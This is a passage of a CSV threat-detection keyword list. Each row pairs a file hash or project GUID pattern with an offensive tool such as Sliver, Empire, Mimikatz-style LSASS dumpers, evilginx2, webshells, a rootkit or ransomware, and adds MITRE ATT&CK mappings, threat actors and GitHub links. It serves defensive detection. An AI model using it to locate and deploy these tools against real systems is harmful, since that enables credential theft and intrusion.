- TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","#filehash","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","42068" "*e4d3d57f4de0497d24095cbd83d5500268323e247e4de2e69cd704975b134678*",".{0,1000}e4d3d57f4de0497d24095cbd83d5500268323e247e4de2e69cd704975b134678.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42070" "*e4d484d9bac7434247fff0c298b8af6b681fa6b140b573d8ce78b1f3bed94e6b*",".{0,1000}e4d484d9bac7434247fff0c298b8af6b681fa6b140b573d8ce78b1f3bed94e6b.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - 
TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","0","#filehash","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","42071" "*E4D9EF39-0FCE-4573-978B-ABF8DF6AEC23*",".{0,1000}E4D9EF39\-0FCE\-4573\-978B\-ABF8DF6AEC23.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","0","#GUIDproject","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","42072" "*e4df5a904c8eb505cb63d9905c398f632cf97ba193a6e25569d561d44f69e623*",".{0,1000}e4df5a904c8eb505cb63d9905c398f632cf97ba193a6e25569d561d44f69e623.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","0","#filehash #linux","N/A","7","6","575","101","2024-06-19T14:29:09Z","2016-04-28T16:45:02Z","42073" "*e4ed972586dead9a986aaec11cf76e5e044549b69b2fb9bbf5a685f281997bc8*",".{0,1000}e4ed972586dead9a986aaec11cf76e5e044549b69b2fb9bbf5a685f281997bc8.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","42075" 
"*e4f24bd9724afff4200cf4c57eeb2ba37b9bf99b7add53ce1262e2e98c80a812*",".{0,1000}e4f24bd9724afff4200cf4c57eeb2ba37b9bf99b7add53ce1262e2e98c80a812.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","42076" "*e4f33ee9ba4d86685f8df4a89e192a354139edcf*",".{0,1000}e4f33ee9ba4d86685f8df4a89e192a354139edcf.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","42077" "*e4fa7af0b270b4729602f6d8d41d564ce21d805c4a43e826483ba7761acd3a4e*",".{0,1000}e4fa7af0b270b4729602f6d8d41d564ce21d805c4a43e826483ba7761acd3a4e.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","42078" "*e4fef08ac954c5787ff0c72defb9a496d030509dd2eca2afc6ef2d9c669cca71*",".{0,1000}e4fef08ac954c5787ff0c72defb9a496d030509dd2eca2afc6ef2d9c669cca71.{0,1000}","offensive_tool_keyword","BadRentdrv2","A vulnerable driver (BYOVD) capable of terminating several EDRs and antivirus software","T1562 - T1068 - T1210 - T1489 - T1496","TA0005 - TA0004 - TA0040","N/A","Agrius","Defense 
Evasion","https://github.com/keowu/BadRentdrv2","1","0","#filehash","N/A","10","1","95","20","2024-12-26T13:43:18Z","2023-10-01T18:24:38Z","42079" "*e50686bb739ce69050f960b06ec6dcdbd4a7bfe8c0a08abbe9b9cac45f04d787*",".{0,1000}e50686bb739ce69050f960b06ec6dcdbd4a7bfe8c0a08abbe9b9cac45f04d787.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","42080" "*e50bd0143399ca09e3a293f2546cdacb0bf093294dda39263474ed55d8e1743d*",".{0,1000}e50bd0143399ca09e3a293f2546cdacb0bf093294dda39263474ed55d8e1743d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","42081" "*e50c620c59b9a402d924b65695c6ee723cf10bbf65c542416888776f3b58282f*",".{0,1000}e50c620c59b9a402d924b65695c6ee723cf10bbf65c542416888776f3b58282f.{0,1000}","offensive_tool_keyword","Checkmate","payload Execution by Fake Windows SmartScreen with requires Administrator privileges & Turn off real SmartScreen Filter","T1059 - T1070 - T1546","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/S3N4T0R-0X0/Checkmate","1","0","#filehash","N/A","9","1","95","16","2024-01-12T19:03:45Z","2024-01-04T15:56:37Z","42082" 
"*e5139e7b40768b3a2a6be05138cd8c5cd5fc71eb60b108e0743077f0e4df3a4d*",".{0,1000}e5139e7b40768b3a2a6be05138cd8c5cd5fc71eb60b108e0743077f0e4df3a4d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","42083" "*E51B9AEB-5F48-4C5C-837E-3A2743917427*",".{0,1000}E51B9AEB\-5F48\-4C5C\-837E\-3A2743917427.{0,1000}","offensive_tool_keyword","RedTeam_Tools_n_Stuff","Collection of self-made Red Team tools","T1070.004 - T1222 - T1070.003 - T1003.005 - T1057","TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/samkenxstream/SAMkenXCCorePHdLAwiN8SoLr77","1","0","#GUIDproject","N/A","7","1","1","1","2023-10-13T06:31:42Z","2023-10-04T13:43:37Z","42085" "*e51e4cf322780a163acaa6e3f0b2e04a69f071a2295231b8f4fe07e6977acf24*",".{0,1000}e51e4cf322780a163acaa6e3f0b2e04a69f071a2295231b8f4fe07e6977acf24.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42088" "*e5285e73892bee5dd811a25cc0f2848fbe995c0aebfa2fd4ac533a8f2a619cec*",".{0,1000}e5285e73892bee5dd811a25cc0f2848fbe995c0aebfa2fd4ac533a8f2a619cec.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential 
Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","42089" "*e52b09300e5f48a7584601a8c576ab946e4818156e40d355d36d087906bb66d1*",".{0,1000}e52b09300e5f48a7584601a8c576ab946e4818156e40d355d36d087906bb66d1.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42090" "*e52f7c5cdfbcfd07c3af1a5d4b192e804f2a29cc1cacff6573ad701cbeb8440a*",".{0,1000}e52f7c5cdfbcfd07c3af1a5d4b192e804f2a29cc1cacff6573ad701cbeb8440a.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","0","#filehash","N/A","10","2","191","21","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z","42091" "*e532449171a8fb15657347c2b6df8391c93227af3fb386011a4e8b40d780ad24*",".{0,1000}e532449171a8fb15657347c2b6df8391c93227af3fb386011a4e8b40d780ad24.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","42092" "*e53c37e94cfa66023839a9db008e7953f524db0dd6b5f1a467f1a55827aa63df*",".{0,1000}e53c37e94cfa66023839a9db008e7953f524db0dd6b5f1a467f1a55827aa63df.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - 
Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","42094" "*e53f158d-8aa2-8c53-da89-ab75d32c8c01*",".{0,1000}e53f158d\-8aa2\-8c53\-da89\-ab75d32c8c01.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","#GUIDproject","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","42095" "*E54195F0-060C-4B24-98F2-AD9FB5351045*",".{0,1000}E54195F0\-060C\-4B24\-98F2\-AD9FB5351045.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","Black Basta","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","#GUIDproject","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","42096" "*e54299149f25b882cb0900a2977eb6d72a4fa88fb96b67b370981b42b66d7733*",".{0,1000}e54299149f25b882cb0900a2977eb6d72a4fa88fb96b67b370981b42b66d7733.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","42097" "*e542e94c43340357ded227e309c20e1e03505295a8dba216781f2976ff29c449*",".{0,1000}e542e94c43340357ded227e309c20e1e03505295a8dba216781f2976ff29c449.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black 
Basta","C2","https://github.com/MythicAgents/thanatos","1","0","#filehash","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","42098" "*e54638737bca6cbd70f72c8afec371ec20df3ab8ae7d4f4c6b549008cb5a3cc9*",".{0,1000}e54638737bca6cbd70f72c8afec371ec20df3ab8ae7d4f4c6b549008cb5a3cc9.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42099" "*e5474ff71a5e81a3fde493dde6141b25fbcff158367cc0fc492c063f0e59ca6a*",".{0,1000}e5474ff71a5e81a3fde493dde6141b25fbcff158367cc0fc492c063f0e59ca6a.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","42101" "*e5509a144cb371b7afe6fb6a526fca317688da6b27bfcb7be1faf8fffd58a472*",".{0,1000}e5509a144cb371b7afe6fb6a526fca317688da6b27bfcb7be1faf8fffd58a472.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","42104" 
"*e55bdac582b5e2b4a3fe52e6c070f2c313d3466ed7ee58266cba3a74c1542f91*",".{0,1000}e55bdac582b5e2b4a3fe52e6c070f2c313d3466ed7ee58266cba3a74c1542f91.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42105" "*e55c296872a04e46369c46c23bae5707cd7d2e079a2f8350015475b5eecd3e17*",".{0,1000}e55c296872a04e46369c46c23bae5707cd7d2e079a2f8350015475b5eecd3e17.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK 
SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","42106" "*e55c85d7da9a60ed31867b421961b3503df0b464e068e584fccc20892b05bef2*",".{0,1000}e55c85d7da9a60ed31867b421961b3503df0b464e068e584fccc20892b05bef2.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","#filehash","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","42107" "*E55F7214-8CC4-4E1D-AEDB-C908D23902A4*",".{0,1000}E55F7214\-8CC4\-4E1D\-AEDB\-C908D23902A4.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#GUIDproject","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","42108" "*e5677fba46f78b856db90d573786aa5a46f068ddc9d5565ebb16a16795d05693*",".{0,1000}e5677fba46f78b856db90d573786aa5a46f068ddc9d5565ebb16a16795d05693.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","42109" 
"*e56bee79647fdae60a15c1dc283a990121cd5f387900929ca044dff8e0e2b427*",".{0,1000}e56bee79647fdae60a15c1dc283a990121cd5f387900929ca044dff8e0e2b427.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","42110" "*e56cc23ffa05a02bdb22fd0db6b82e1b91d64ce467bf9be73236edab7cf11af2*",".{0,1000}e56cc23ffa05a02bdb22fd0db6b82e1b91d64ce467bf9be73236edab7cf11af2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42111" "*e56e4f05ebf54dc82142046543f2c81ffeb50eb6b342387461106fc27358fda0*",".{0,1000}e56e4f05ebf54dc82142046543f2c81ffeb50eb6b342387461106fc27358fda0.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","42112" 
"*e572430caf64c4499a1ce4230435438d65a9c40afb1eb0ba2f6209806c19e7fc*",".{0,1000}e572430caf64c4499a1ce4230435438d65a9c40afb1eb0ba2f6209806c19e7fc.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","42113" "*e580ae852e0dd2d7dc9fee540a3718716d99a538bb54cd37fec8c75256d74f27*",".{0,1000}e580ae852e0dd2d7dc9fee540a3718716d99a538bb54cd37fec8c75256d74f27.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#filehash","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","42115" "*e58a3b95502715340515fafbdcaf1df971854d63176929ff25c83e4a1129ecb2*",".{0,1000}e58a3b95502715340515fafbdcaf1df971854d63176929ff25c83e4a1129ecb2.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","42118" "*e58b8ccccb9d997328877f89fa748bc62b4c4b29945abd2a1d8d60b55a84811a*",".{0,1000}e58b8ccccb9d997328877f89fa748bc62b4c4b29945abd2a1d8d60b55a84811a.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","42119" "*e58bed7731a0a2a03e7c402d88a76a7d08c932494d6f5f78c0bc5f35b16ba9f6*",".{0,1000}e58bed7731a0a2a03e7c402d88a76a7d08c932494d6f5f78c0bc5f35b16ba9f6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42120" "*e58c52c3eb69dc4b6cf3a73a42c7a9bc3adc4d0e4728a2a8744715fc730f8b9d*",".{0,1000}e58c52c3eb69dc4b6cf3a73a42c7a9bc3adc4d0e4728a2a8744715fc730f8b9d.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - 
TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","42121" "*e58f01df3692d793fb3441fb2264b60767ae47a9a029b6c22a71ddb0f2f8393f*",".{0,1000}e58f01df3692d793fb3441fb2264b60767ae47a9a029b6c22a71ddb0f2f8393f.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","42122" "*e58f5924f64e96f3f84ef788dde5fc6699f91086a8fbc4797065670a37a3cbcd*",".{0,1000}e58f5924f64e96f3f84ef788dde5fc6699f91086a8fbc4797065670a37a3cbcd.{0,1000}","offensive_tool_keyword","LsassReflectDumping","leverages the Process Forking technique using the RtlCreateProcessReflection API to clone the lsass.exe process. 
Once the clone is created - it utilizes MINIDUMP_CALLBACK_INFORMATION callbacks to generate a memory dump of the cloned process","T1003.001 - T1555.003 - T1077","TA0006","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/LsassReflectDumping","1","0","#filehash","N/A","10","2","198","27","2024-10-19T08:16:13Z","2024-10-17T14:57:30Z","42123" "*e5978b950fec8996d30b98d75e89c1b58fb9a38aa450af8c63ca2f8c23025678*",".{0,1000}e5978b950fec8996d30b98d75e89c1b58fb9a38aa450af8c63ca2f8c23025678.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","42124" "*e599639a7aaf6a9ef2c7ca81bb0c61a3ec12796bb9f35e0959390c24d02ee64b*",".{0,1000}e599639a7aaf6a9ef2c7ca81bb0c61a3ec12796bb9f35e0959390c24d02ee64b.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","42125" 